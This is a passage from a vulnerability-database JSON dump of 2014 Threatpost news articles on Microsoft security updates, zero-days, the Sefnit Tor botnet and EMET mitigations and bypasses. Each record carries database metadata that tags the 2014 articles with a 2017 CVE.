\u201cProbably a limited scenario for exploitation.\u201d\n", "cvss3": {}, "published": "2014-06-05T14:30:33", "type": "threatpost", "title": "June 2014 Microsoft Patch Tuesday Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-06-10T18:53:57", "id": "THREATPOST:A9E6DBBE61D0494D0B0C83151FEC45D0", "href": "https://threatpost.com/microsoft-expected-to-patch-ie-8-zero-day-on-patch-tuesday/106491/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:45", "description": "Microsoft today released its new [myBulletins](<http://blogs.technet.com/b/msrc/archive/2014/05/28/meet-mybulletins-an-online-security-bulletin-customization-service.aspx>) service, an interface where IT administrators can customize security patch update information.\n\nWhile providing users with a slick GUI that allows for extensive filtering of patch information by the products in use inside an enterprise or small company, some users were left hollow.\n\n\u201cFor me it was missing the two most important things: notifications and security advisories,\u201d said Andrew Storms, director of DevOps for CloudPassage.\n\nSecurity advisories differ from the roundup of monthly security bulletins that accompany Patch Tuesday security updates; advisories can warn users of zero-day vulnerabilities in Windows, Internet Explorer or other Microsoft software products. Other recent advisories provide administrators with a heads up regarding [changes in how Microsoft handles older encryption algorithms such as RC4](<http://threatpost.com/microsoft-giving-net-users-the-option-to-shed-rc4/106083>) or the [deprecation of older hashes such as MD5](<http://threatpost.com/light-microsoft-patch-load-precedes-md5-deprecation/104104>).\n\nMicrosoft said myBulletins was built based on user feedback and enables administrators to personalize bulletins that matter most to their companies. 
Users need only log in using a Microsoft account and select the products and versions in use in their IT shops in order to get a display of the bulletins that apply to those products.\n\n\u201cYou shared that you needed the ability to cut through complexity and make decisions quickly,\u201d wrote Tracey Pretorius, director, Microsoft Trustworthy Computing. \u201cYou wanted help identifying the information that is most relevant to your organization. We heard you and acted on your feedback.\u201d\n\nUsers have a number of search and filtering options, Microsoft said, and can prioritize bulletins by release date, severity and reboot requirements.\n\nMany of those same options, however, are available in Windows Server Update Services (WSUS). Most organizations running a large number of Windows desktops and servers use WSUS to manage patch distribution.\n\n\u201cIt\u2019s not clear why I would use it over WSUS,\u201d Storms said. \u201cPlus WSUS provides me actionable [intelligence] on what systems need what patches. WSUS lets you select what products to subscribe to. It pulls patches, distributes them and tells you what systems need updates.\u201d\n\n\u201cmyBulletins is intended for IT professionals who are responsible for ongoing security specific update management within their organizations,\u201d Pretorius said. \u201cWe believe it is a useful online service for administrators in enterprise or small and medium sized business environments. This is the debut version of the online service and we welcome and appreciate feedback on how to make this service even better moving forward.\u201d\n\nThe lack of notifications is bothersome because users would have to load the myBulletins dashboard in order to learn if new security bulletins are available.\n\n\u201cGranted myBulletins is a slick search interface. It\u2019s hard to see why it would be useful if you already are using WSUS which is free,\u201d Storms said.\n\n_This article was updated at 5 p.m. 
ET with additional comments from Microsoft._\n", "cvss3": {}, "published": "2014-05-28T16:34:18", "type": "threatpost", "title": "Mixed Reviews on Microsoft myBulletins Patch Service", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-05-28T21:13:49", "id": "THREATPOST:1FA77776DEE21633617B7B927000ADBF", "href": "https://threatpost.com/microsoft-mybulletins-service-customizes-patch-details/106339/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:50", "description": "Microsoft didn\u2019t beat around the bush when it [warned customers to stay away from the deprecated RC4 algorithm](<http://threatpost.com/microsoft-warns-customers-away-from-sha-1-and-rc4/102902>) last fall. Now it\u2019s giving those who use its .NET software framework an option to disable the cipher in Transport Layer Security (TLS) as well.\n\nIn a security advisory issued on its [Security TechCenter](<https://technet.microsoft.com/en-us/library/security/2960358>) yesterday, echoing its stance last year, Microsoft pointed out that using RC4 in TLS can give an attacker the ability to perform man-in-the-middle attacks and siphon away plaintext from encrypted sessions.\n\n[In November, Microsoft gave](<http://blogs.technet.com/b/srd/archive/2013/11/12/security-advisory-2868725-recommendation-to-disable-rc4.aspx>) those using Windows 7, Windows 8, Windows RT, Server 2008 R2, and Server 2012 the ability to disable the troublesome cipher. Now, six months later, the company is letting anyone running the latest version of .NET do the same by modifying the system registry. 
While .NET users looking to download the updates can find them at Microsoft\u2019s Download Center and Microsoft\u2019s Update Catalog, it\u2019s keeping the update off of Windows Update \u201cin order to give customers the ability to plan and test the new settings for disabling RC4 prior to implementation in their environments.\u201d\n\nRC4\u2019s faults have been well-documented. Now a quarter century old, the cipher is one of the older algorithms in use across the Internet today. With its usage has come an influx of practical attacks, many that can recover plaintext. [One such attack](<http://threatpost.com/attack-exploits-weakness-rc4-cipher-decrypt-user-sessions-031413/77628>), dug up last year by researcher and University of Illinois at Chicago professor Daniel J. Bernstein enabled an attacker to fully compromise a victim\u2019s session that\u2019s protected by TLS/RC4.\n\nThe advisory was one of three Microsoft issued yesterday.\n\n[The second](<https://technet.microsoft.com/en-us/library/security/2871997.aspx>) informed users that the company has tweaked a handful of its operating systems to better protect credentials and domain authentication controls. Updates to Windows 8, Windows RT, Server 2012, Windows 7, and Server 2008 R2 will now enforce stricter authentication policies. Microsoft is doing this by adding an extra layer of security to Local Security Authority (LSA), the interface that logs users onto local systems. The update also adds a new admin mode for its Credential Security Support Provider (CredSSP), a protocol that lets programs use client-side Security Support Provider APIs to assign user credentials from client computers to target servers. 
The update to CredSSP should prevent credentials from being harvested if the client ever winds up connecting to a compromised server.\n\nMicrosoft points out that while the updates should be beneficial for anyone running the aforementioned systems, they\u2019ll be most useful in enterprise environments where Windows domains are deployed.\n\nIn [the last advisory](<https://technet.microsoft.com/library/security/2962824>) Microsoft gave users a heads up that it went ahead and revoked the digital signatures for four third-party Unified Extensible Firmware Interface (UEFI) modules yesterday. The advisory is a bit vague, but claims the unnamed modules, which could be loaded during a Secure Boot, were not in compliance with the company\u2019s certification program. As the modules were private and third-party, not a whole lot more information was given but Microsoft claims the move was as part of its \u201congoing efforts to protect customers.\u201d\n\nAll advisories of course come on the heels of [yesterday\u2019s Patch Tuesday updates](<http://threatpost.com/microsoft-adobe-issue-critical-fixes-for-may-2014-patch-tuesday/106062>). 
The update addressed 13 issues, including critical vulnerabilities in IE and its SharePoint Server software.\n", "cvss3": {}, "published": "2014-05-14T13:21:35", "type": "threatpost", "title": "Microsoft Giving .NET Users The Option to Shed RC4", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-05-14T17:21:35", "id": "THREATPOST:ED7B090DD1289553529F8B6FD87BF467", "href": "https://threatpost.com/microsoft-giving-net-users-the-option-to-shed-rc4/106083/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:02", "description": "Threat modeling has been part of the security culture at Microsoft for the better part of a decade, an important piece of the Security Development Lifecycle that\u2019s at the core of Trustworthy Computing.\n\nToday, Microsoft updated its free Threat Modeling Tool with a number of enhancements that bring the practice closer to not only large enterprises, but also smaller companies with a growing target on their back.\n\nFour new features have been added to the tool, including enhancements to its visualization capabilities, support for migrating older models and for custom threat definitions, as well as a change to how it generates threats.\n\n\u201cMore and more of the customers I have been talking to have been leveraging threat modeling as a systematic way to find design-level security and privacy weaknesses in systems they are building and operating,\u201d said Tim Rains, a Trustworthy Computing manager. \u201cThreat modeling is also used to help identify mitigations that can reduce the overall risk to a system and the data it processes. 
Once customers try threat modeling, they typically find it to be a useful addition to their approach to risk management.\u201d\n\nThe first iteration of Microsoft Threat Modeling Tool was issued in 2011, but Rains said customer feedback and suggestions for improvements since then have been rolled into this update. The improvements include a new drawing surface that no longer requires Microsoft Visio to build data flow diagrams. The update also includes the ability to migrate older, existing threat models built with version 3.1.8 to the new format. Users can also upload existing custom-built threat definitions into the tool, which also comes with its own definitions.\n\nThe biggest change in the new version is in its threat-generation logic. Where previous versions followed [the STRIDE framework](<http://msdn.microsoft.com/en-us/magazine/cc163519.aspx>) (Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, and Elevation of privilege) per element, this one follows STRIDE per interaction of those elements. STRIDE helps users map threats to the properties guarding against them, for example, spoofing maps to authentication.\n\n\u201cWe take into consideration the type of elements used on the diagram (e.g. processes, data stores etc.) and what type of data flows connect these elements,\u201d Rains said.\n\nAt the RSA Conference in February, Trustworthy Computing program manager Adam Shostack said that there is [no one defined way to model threats](<http://threatpost.com/threat-modeling-legos-and-dancing-babies/104517>); that they must be specific to organizations and their particular risks.\n\n\u201cI now think of threat modeling like Legos. There are things you can snap together and use what you need,\u201d Shostack said. \u201cThere\u2019s no one way to threat model. 
The right way is the way that fixes good threats.\u201d\n", "cvss3": {}, "published": "2014-04-15T15:07:23", "type": "threatpost", "title": "Microsoft Releases Free Threat Modeling Tool 2014", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-04-17T19:50:40", "id": "THREATPOST:5C4C4351A746ADF8A7F1B2D316888C01", "href": "https://threatpost.com/microsoft-releases-updated-threat-modeling-tool-2014/105467/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:04", "description": "Microsoft confirmed today it will support HTTPS Strict Transport Protocol (HSTS) in Internet Explorer 12, bringing its browser in line with other major vendors in its support of the protocol.\n\nBrowsers supporting [HSTS](<https://tools.ietf.org/html/rfc6797>) force any sessions sent over HTTP to be sent instead over HTTPS, encrypting communication to and from a website.\n\nAccording to OWASP, HSTS protects users from a number of threats, in particular man-in-the-middle attacks by not only forcing encrypted sessions, but also stopping attackers who use invalid digital certificates. The protocol denies users the ability to override invalid certificate messages. HSTS also protects users from HTTPS websites that also may include HTTP links or serve content unencrypted.\n\nIE 12 is expected to be released this year; IE 11 was introduced in October 2013 and is the default browser in Windows 8.1.\n\nIE 12\u2019s support of HSTS puts it on an even keel with other browsers, some of which, such as Chrome and Firefox, have supported the protocol since 2011. 
Apple added HSTS support on Safari upon the release of Mavericks 10.9.\n\nAccording to the Electronic Frontier Foundation\u2019s [Encrypt the Web](<https://www.eff.org/deeplinks/2013/11/encrypt-web-report-whos-doing-what>) report, a few leading technology companies already support HSTS on their websites, including Dropbox, Foursquare, SpiderOak and Twitter. Others such as Facebook, LinkedIn, Tumblr, and Yahoo also plan to do so this year; Google too for select domains.\n\nEFF staff technologist Jeremy Gillula said today that developers either are unaware of the [availability of HSTS](<https://www.eff.org/deeplinks/2014/02/websites-hsts>), or have been stymied by incomplete support in browsers.\n\n\u201cThis is changing though: we noticed that Apple quietly added HSTS support to Safari in OS X 10.9,\u201d Gillula said. \u201cFor now, Internet Explorer doesn\u2019t support HSTS\u2014which means that there\u2019s basically no such thing as a secure website in IE.\u201d\n\nUntil that happens, much of the security burden falls on the user to either rely on a browser that supports HSTS, or use something such as the HTTPS Everywhere browser extension.\n\n\u201cFor now all a savvy user can do is to always carefully examine the address of the site you\u2019ve loaded, and verify that it\u2019s secure by checking to make sure it has \u201chttps\u201d in the front and is the precise address you want to visit,\u201d Gillula said. \u201cUnfortunately this assumes that you know ahead of time (and remember) whether or not a site should be secure, and are meticulous with every website you visit.\u201d\n\nSecure protocols such as HTTPS, HSTS and Perfect Forward Secrecy have been given greater priority now that the depths of NSA and government surveillance have been exposed. 
Experts urge developers to consider encryption technologies such as these a minimum standard for web-based services such as email.\n\nJust this week, Yahoo caught up to many of its contemporaries when it announced that it had [encrypted traffic moving between its data centers](<http://threatpost.com/yahoo-encrypts-data-center-links-boosts-other-services/105228>); Snowden documents revealed that the NSA and Britain\u2019s GCHQ were able to tap into overseas fiber optic cables and copy data as it moved to the company\u2019s data centers. Yahoo also announced its intention to support HSTS, Perfect Forward Secrecy and Certificate Transparency this year.\n", "cvss3": {}, "published": "2014-04-04T15:41:30", "type": "threatpost", "title": "IE 12 to Support HSTS Encryption Protocol", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-04-09T18:05:31", "id": "THREATPOST:848870C5AD3BB637321291CEF571A5F9", "href": "https://threatpost.com/ie-12-to-support-hsts-encryption-protocol/105266/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:04", "description": "[As expected](<http://threatpost.com/microsoft-to-fix-word-zero-day-with-final-xp-patch/105241>), Microsoft issued its final epitaph for Windows XP today, pushing out four security bulletins for 11 vulnerabilities, including the last updates for the oft-maligned, thirteen-year-old operating system.\n\nDespite it being XP\u2019s last gasp from a security standpoint, it\u2019s actually a relatively light batch of [Patch Tuesday updates](<http://technet.microsoft.com/en-us/security/bulletin/ms14-apr>) this month. 
Two of the bulletins are branded critical and the other two important, but all of them can lead to remote code execution in their respective software, including recent versions of Word and some versions of Internet Explorer, if left unpatched.\n\nThe first critical patch (MS14-017) fixes a zero day first discovered last month in Microsoft Word. The patch fixes three vulnerabilities in total, chief among them the RTF memory corruption vulnerability that\u2019s been [discussed in depth](<http://threatpost.com/word-zero-day-attacks-use-complex-chain-of-exploits/105002>) over the past month. That bug could open the program up to remote code execution and let an attacker gain administrative rights if a specially crafted RTF file is either opened or previewed in Word or Outlook. [Microsoft first warned about the vulnerability](<http://threatpost.com/targeted-attacks-exploit-microsoft-word-zero-day/104980>) \u2013 first in an advisory last month, then in a Fix-It \u2013 after it discovered limited targeted attacks that used it for a vector in the wild. The exploit for the zero day, rather complex in nature, includes ASLR bypass, ROP techniques and shellcode with multiple mechanisms designed to circumvent analysis. In addition to the memory corruption bug, the patch also fixes two additional vulnerabilities: a file format converter vulnerability in Office and a stack overflow vulnerability in Word.\n\nThe Word issue is the only bug being patched today that\u2019s actively being exploited, so naturally experts are calling it the biggest priority of the four for service administrators.\n\n\u201cThis continues a trend we\u2019ve seen of Office-based exploits being successfully used in targeted attacks over the past few years,\u201d Marc Maiffret, the CTO of BeyondTrust said Tuesday. 
\u201cDeploy this patch as soon as possible to fix vulnerabilities in both Word and Office Web apps.\u201d\n\nThe second critical patch (MS14-018) also fixes a memory corruption bug, six of them to be exact, in most versions (6-9, 11) of Internet Explorer. Much like the Word vulnerability, if a user were to stumble upon a malicious webpage an attacker could exploit the bug to execute code on the computer in the context of its current user. This vulnerability is one of two that affect components on XP, including IE 6 for those still running XP\u2019s Service Pack 3 and its Professional x64 Edition Service Pack 2.\n\nA previously disclosed file handling vulnerability (MS14-019) was also fixed by today\u2019s updates that could have allowed remote code execution in Windows. If left unpatched an attacker could trick a user into running a specially crafted .bat or .cmd file and gain command. While still important, it\u2019s safe to say this vulnerability may be the least dangerous of today\u2019s patches as a user would have to be tempted to execute a batch file on a malicious network share. 
Still, this is the second issue that could affect users running some outdated versions of XP.\n\nThe last patch (MS14-020) addresses a hole that could open a machine up to remote code execution if someone were to open a specially crafted Microsoft Publisher file.\n\nWhile it may seem minor, Ross Barrett, Senior Manager of Security Engineering at Rapid7, is encouraging any firms that use the software on their system to prioritize the patch.\n\n\u201cI expect anyone who still works with it might actually be gullible enough to click on email attachments of Publisher documents,\u201d Barrett said of the vulnerability on Tuesday.\n\nOn top of the two bulletins that affect XP, both the Publisher issue and the Word issue figure into two bulletins that also affect Microsoft Word 2003, the final four updates for both XP and Office 2003.\n\nIf somehow you missed it, [Microsoft is ending support for XP](<http://threatpost.com/microsoft-xp-end-of-life-an-important-security-milestone/102789>), Internet Explorer 6 and Office 2003 today, meaning this month\u2019s patches mark the last time the company will issue security updates for these products. 
While it\u2019s only a scant four bulletins, this makes April\u2019s Patch Tuesday an essential one for those who rely on the outdated platforms and apps.\n\nIt\u2019s assumed many admins are in the process of migrating off of XP \u2013 but it\u2019s likely they\u2019ll continue to have their hands full, not just with today\u2019s updates, but also recent updates from [Google](<http://threatpost.com/google-patches-four-pwn2own-bugs-in-chrome-33/104828>), [Mozilla](<http://threatpost.com/mozilla-patches-pwn2own-zero-days-in-firefox-28/104889>), [Apple](<http://threatpost.com/apple-fixes-more-than-25-flaws-in-safari/105197>) and other companies following last month\u2019s Pwn2Own competition.\n\n[It\u2019s widely expected](<http://threatpost.com/windows-xp-end-of-life-breeding-equal-parts-fud-legit-concerns/105252>) that a subset of attackers will ramp up exploits targeting XP after today and potentially examine patches for modern Windows 7 and 8 systems and adapt them to now no-longer supported XP machines.\n", "cvss3": {}, "published": "2014-04-08T15:52:10", "type": "threatpost", "title": "April Patch Tuesday Fixes 11 Vulnerabilities, Last Updates for XP", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-04-11T18:53:10", "id": "THREATPOST:A2C4DFB7FD998E1990946FBDE70D8050", "href": "https://threatpost.com/last-call-for-xp-office-2003-updates-april-patch-tuesday-fixes-11-vulnerabilities/105329/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:09", "description": "Targeted attacks have been spotted against a zero-day vulnerability in Microsoft Word 2010, leading Microsoft to issue a special [security advisory](<http://blogs.technet.com/b/msrc/archive/2014/03/24/microsoft-releases-security-advisory-2953095.aspx>) and produce a [Fix-it solution](<https://support.microsoft.com/kb/2953095>) for users until a patch is ready.\n\nMicrosoft also said 
that its Enhanced Mitigation Experience Toolkit (EMET) is a temporary mitigation for the zero-day. Some versions of EMET would have to be configured to work with Microsoft Office in order to ward off exploits; EMET 4.1 is already configured for Office, for example.\n\nWhile attacks are currently targeting Microsoft Word 2010, Microsoft said the vulnerability affects Word 2003, 2007, 2013 and 2013RT, as well as Office for Mac, Office Web Apps 2010 and 2013, and Word Viewer.\n\nAn attacker could exploit the vulnerability with a malicious Rich Text Format file or email in Outlook configured to use Microsoft Word as the email viewer, said Dustin Childs, a Trustworthy Computing group manager at Microsoft.\n\nThe vulnerability can also be exploited over the Web where an attacker could host a website containing a malicious RTF exploit, or upload a malicious RTF exploit onto a site that accepts user-provided content. Victims would have to be enticed into opening the content; an exploit cannot be triggered without user interaction.\n\nThe Fix it disables opening of RTF content in Word, Microsoft said.\n\n\u201cThe issue is caused when Microsoft Word parses specially crafted RTF-formatted data causing system memory to become corrupted in such a way that an attacker could execute arbitrary code,\u201d Microsoft said in its advisory, adding that Word is by default the email reader in Outlook 2007, 2010 and 2013.\n\nMicrosoft said it could release an out-of-band patch, but more likely it will wait until its next Patch Tuesday security updates are released on April 8. That date also signals the end of support for Windows XP, Microsoft announced some time ago.\n\nMicrosoft has made it a common practice to release Fix it mitigations or recommend the use of EMET as a temporary stopgap while zero-day vulnerabilities are being actively exploited in the wild. 
The last one issued was in February for a string of attacks against a [zero day in Internet Explorer](<http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CCcQFjAA&url=http%3A%2F%2Fthreatpost.com%2Fmicrosoft-ships-fix-it-for-ie-10-zero-day%2F104383&ei=pH8wU-bhGcyGkQeZ7YDoBA&usg=AFQjCNGZPcpQBjYGur3Gsyg2qMm5Pwg--Q&bvm=bv.62922401,d.eW0&cad=rja>).\n\nThe vulnerability in IE 10 was exploited by [two different hacker groups](<http://threatpost.com/second-group-seen-using-ie-10-zero-day/104344>) against government and aerospace targets in the U.S. and France respectively. The same use-after-free vulnerability was present in IE 9 but was not being exploited.\n\nEMET has also been a popular mitigation recommendation from Microsoft against memory-based vulnerabilities. The toolkit contains a dozen mitigations that fend off buffer overflow attacks and others that allow attackers to execute code on vulnerable machines.\n\nMost recently, Microsoft released a [technical preview of EMET 5.0](<http://threatpost.com/emet-5-0-technical-preview-offers-secure-plug-in-control/104490>) that included two new exploit mitigations. 
Researchers, however, have been finding moderate success in developing [bypasses for some of the protections bundled in with EMET](<http://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619>).\n", "cvss3": {}, "published": "2014-03-24T15:20:55", "type": "threatpost", "title": "Microsoft Advisory Warns of Word Zero-Day Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-03-27T17:51:05", "id": "THREATPOST:E4FBCA31AB2D69F0292283738E873960", "href": "https://threatpost.com/targeted-attacks-exploit-microsoft-word-zero-day/104980/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:15", "description": "Alarm bells went off last August when spikes in Tor client downloads were traced to a large click-fraud and Bitcoin-mining botnet called Sefnit.\n\nThe [malware was using the popular anonymity network to communicate with hackers](<http://threatpost.com/huge-botnet-found-using-tor-network-for-communications/102179>) in order to transmit stolen data and receive additional commands. 
In Sefnit\u2019s case, the 600 percent increase in Tor usage it kicked off was also its [downfall](<http://threatpost.com/moving-to-tor-a-bad-move-for-massive-botnet/102284>) as Tor administrators noticed performance issues and steps were taken to strangle its activity.\n\nHackers\u2019 use of Tor and other Darknet services is really nothing new, but incidents such as the Sefnit takedown that ensued as well as the disruption of the Silk Road drug and malware underground market that also operated over Tor shed more light on the practice.\n\nFor example, researchers at Kaspersky Lab have published research uncovering three different campaigns that use Tor as a host infrastructure for criminal malware activities: a [64-bit version of the Zeus Trojan](<http://www.securelist.com/en/blog/208214171/The_inevitable_move_64_bit_ZeuS_has_come_enhanced_with_Tor>) that sends traffic through Tor and creates Tor hidden services to obscure the hackers\u2019 location; [Chewbacca](<http://threatpost.com/chewbacca-latest-malware-to-take-a-liking-to-tor/103220>), a Trojan that steals data from memory in the manner of RAM scrapers, and communicates over Tor; and most recently an Android Trojan that uses a .onion domain as a command and control infrastructure.\n\nSergey Lozhkin, a senior researcher with Kaspersky Lab, said his work investigating [criminals\u2019 use of darknets](<http://www.securelist.com/en/blog/8187/Tor_hidden_services_a_safe_haven_for_cybercriminals>) turned up 900 Tor hidden services and 5,500 nodes.\n\n\u201cThe possibility of creating an anonymous and abuse-free underground forum, market or malware C&C server is attracting more and more criminals to the Tor network,\u201d Lozhkin said. 
\u201cHosting C&C servers in Tor makes them harder to identify, blacklist or eliminate.\u201d\n\nLozhkin said Tor underground markets aren\u2019t set up much differently than legitimate ecommerce sites; most include some sort of registration process, offer buyers ratings on traders, and familiar interfaces through which purchases are made. Criminals are selling everything from money laundering services to credit cards, skimmers, carding equipment and more. And most of it is sold using Bitcoin.\n\nYesterday, Microsoft published new details on [Sefnit\u2019s Tor components](<http://blogs.technet.com/b/mmpc/archive/2014/03/05/sefnit-s-tor-botnet-c-amp-c-details.aspx>) and configuration data, the domains it was in contact with and how it communicates over Tor.\n\nAfter the August spike in Tor traffic alerted experts, Microsoft took steps to stop the botnet that were finally realized last Oct. 27 when it modified signatures sent through its update services that removed the outdated Tor client service installed by the malware. The Tor client service had a specific configuration that Microsoft identified, and despite some concerns that Microsoft was overstepping by possibly snaring some versions of Tor legitimately installed by users, the cleanup moved forward and Sefnit numbers dwindled.\n\nThe version installed with Sefnit was v0.2.3.25 and it did not automatically update, Microsoft said, leaving users exposed to a number of exploitable vulnerabilities. The Tor client was added as a Windows service on every computer infected by Sefnit and was configured to accept connections over ports 9050 and 9051; 9051 was used by Sefnit to obtain status information regarding its connection to Tor, while 9050 was used as a communication point for the malware\u2019s SOCKS proxy. Any application configured to use that proxy server could, Microsoft said, communicate over Tor. 
Sefnit, Microsoft said, used this port to contact its command servers and bypass intrusion detection systems, and utilized Tor hidden services to obfuscate server locations.\n\nThe malware comes with a list of .onion domains that are drop points for stolen data. Microsoft said the list of C&C servers was found in a file inside a random, cryptographically generated directory. Within that directory is a file with a .ct extension that contains the victim\u2019s IP address, a string that is likely a victim ID, a list of command and control domains, and a working directory of the malware, Microsoft said.\n\nMicrosoft said that at its peak in August 2013 there were an estimated four million Sefnit clients that began receiving commands; that number had dipped significantly by the end of December, leaving [two million that could still be at risk](<http://blogs.technet.com/b/mmpc/archive/2014/01/09/tackling-the-sefnit-botnet-tor-hazard.aspx>) for attack because of Sefnit-added Tor services that are outdated, Microsoft said.\n", "cvss3": {}, "published": "2014-03-06T13:49:15", "type": "threatpost", "title": "Microsoft, Kaspersky Shed Light on Sefnit Tor Botnet", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-03-10T15:51:07", "id": "THREATPOST:027F94626186E3644FA6008B6B65879D", "href": "https://threatpost.com/shedding-new-light-on-tor-based-malware/104651/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:16", "description": "Exploits bypassing Microsoft\u2019s Enhanced Mitigation Experience Toolkit, or EMET, are quickly becoming a parlor game for security researchers. 
With increasing frequency, white hats are poking holes in EMET, and to its credit, Microsoft has been quick to not only address those issues but challenge and reward researchers who successfully submit bypasses to its [bounty program](<http://threatpost.com/latest-microsoft-100000-bounty-winner-bypasses-aslr-dep-mitigations/104328>).\n\nThe tide may be turning, however, if the latest Internet Explorer zero day is any indication. An exploit used as part of the [Operation SnowMan espionage campaign](<http://threatpost.com/new-ie-10-zero-day-targeting-military-intelligence/104272>) against U.S. military targets contained a feature that checked whether an EMET library was running on the compromised host, and if so, the attack would not execute.\n\nThat\u2019s not the same as an in-the-wild exploit for EMET, but that may not be too far down the road, especially when you take into consideration two important factors: Microsoft continues to market EMET as an effective and temporary zero-day mitigation until a patch is released; and the impending end-of-life of Windows XP on April 8 could spark a surge in EMET installations as a stopgap.\n\nIn the meantime, the [EMET bypasses](<http://threatpost.com/researchers-develop-complete-microsoft-emet-bypass/104437>) keep on coming. The latest targeted a couple of mitigations in the [EMET 5.0 Technical Preview](<http://threatpost.com/emet-5-0-technical-preview-offers-secure-plug-in-control/104490>) released last week during RSA Conference 2014. Researchers at Exodus Intelligence refused to share much in the way of details on the exploit, preferring to offer it to its customers before making it available for public consumption. A tweet from cofounder and vice president of operations Peter Vreugdenhil said: \u201cEMET 5 bypassed with 20 ROP gadgets. ntdll only, esp points to heap containing fake stack, no other regs required. 
Adding to our feed soon.\u201d\n\nVreugdenhil is a fan of EMET, and is in the camp that believes hackers will be adding EMET bypasses to exploits within a year or two, despite the EMET module in Operation SnowMan, which he believes was added in order to keep the campaign from being detected as long as possible.\n\n\u201cI think most of the reason is that the return on investment for the bad guys is really not that high at this point,\u201d Vreugdenhil said. \u201cThat also means that by the time everybody actually uses [EMET] and the more ground it gains, the more likely it becomes that return on investment for the bad guys will be high enough for them to add it to their exploits.\u201d\n\nEMET provides users with a dozen [mitigations against memory-based exploits](<http://technet.microsoft.com/en-us/security/jj653751>), including ASLR, DEP, Export Address Table Filtering, Heapspray Allocation, and five return-oriented programming mitigations. ROP chains are the most effective bypass technique in use today, one that Vreugdenhil has used on a couple of occasions against EMET.\n\nWriting exploits targeting EMET, he said, is a little more involved than targeting a vulnerability in third-party software such as Flash or Java. Vreugdenhil said he generally starts with a publicly available exploit such as the latest IE 10 zero day and observes the crash the bug causes in order to understand how it corrupts memory and, hopefully, discloses memory that can be used to build a ROP chain. Microsoft\u2019s addition of Data Execution Prevention and ASLR in Windows Vista and Windows 7 prevents attackers from executing code in a particular memory location because those memory modules are now randomized.\n\n\u201cBack in Windows XP when there was no ASLR and no randomization of the modules, it was relatively easy. You would just pick a module and then reuse the code inside that module to still get code execution,\u201d Vreugdenhil said. 
\u201cWindows 7 came out and put the bar higher by shuffling the modules around, so theoretically, you didn\u2019t know where your modules were in the process. It theoretically should be impossible to point at an address and say \u2018Hey would you execute code at that address because I know there\u2019s something going to be there.\u2019\u201d\n\nIf an attacker can force a process to leak memory from inside back to an exploit, the attacker will be able to reuse that information and bypass ASLR and DEP because he will know where the memory module is located, Vreugdenhil said. From there, an attacker needs to figure out additional memory protections in place, and address those to control the underlying system.\n\n\u201cIn the case of EMET, there\u2019s a long list of protection mechanisms it adds, there\u2019s only two or three that could be a hindrance if you\u2019re writing a client-side IE exploit. And so it\u2019s usually just a matter of figuring out what they are and coming up with ways to sidestep them,\u201d Vreugdenhil said. 
\u201cIf we can do it, we assume there\u2019s many more people who can do it, and it\u2019s also going to be used by the bad guys anywhere between now and a year or two years.\u201d\n", "cvss3": {}, "published": "2014-03-05T10:07:31", "type": "threatpost", "title": "Researchers Investing in EMET Bypasses More than Hackers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-03-05T20:45:44", "id": "THREATPOST:212ACE7085CC094D6542F00AF0A4D1B4", "href": "https://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:19", "description": "SAN FRANCISCO \u2013 Enterprises beat up by wave after wave of Java exploits and calls to disable the platform may soon have some relief in sight.\n\nMicrosoft\u2019s free Enhanced Mitigation Experience Toolkit will soon have a new feature that allows users to configure where plug-ins, especially those targeted by hackers such as Java and Adobe Flash, are allowed to run by default. The feature is called Attack Surface Reduction, and it\u2019s one of two that Microsoft has made available in a [technical preview of EMET 5.0](<http://blogs.technet.com/b/srd/archive/2014/02/21/announcing-emet-5-0-technical-preview.aspx>) released today at RSA Conference 2014.\n\n\u201cASR is going to help a lot of people,\u201d said Microsoft software security engineer Jonathan Ness.\n\nBlocking Java outright, despite some of the dire attacks reported during the past 15 months, isn\u2019t an option for most companies that have built custom Java applications for critical processes such as payroll or human resources. 
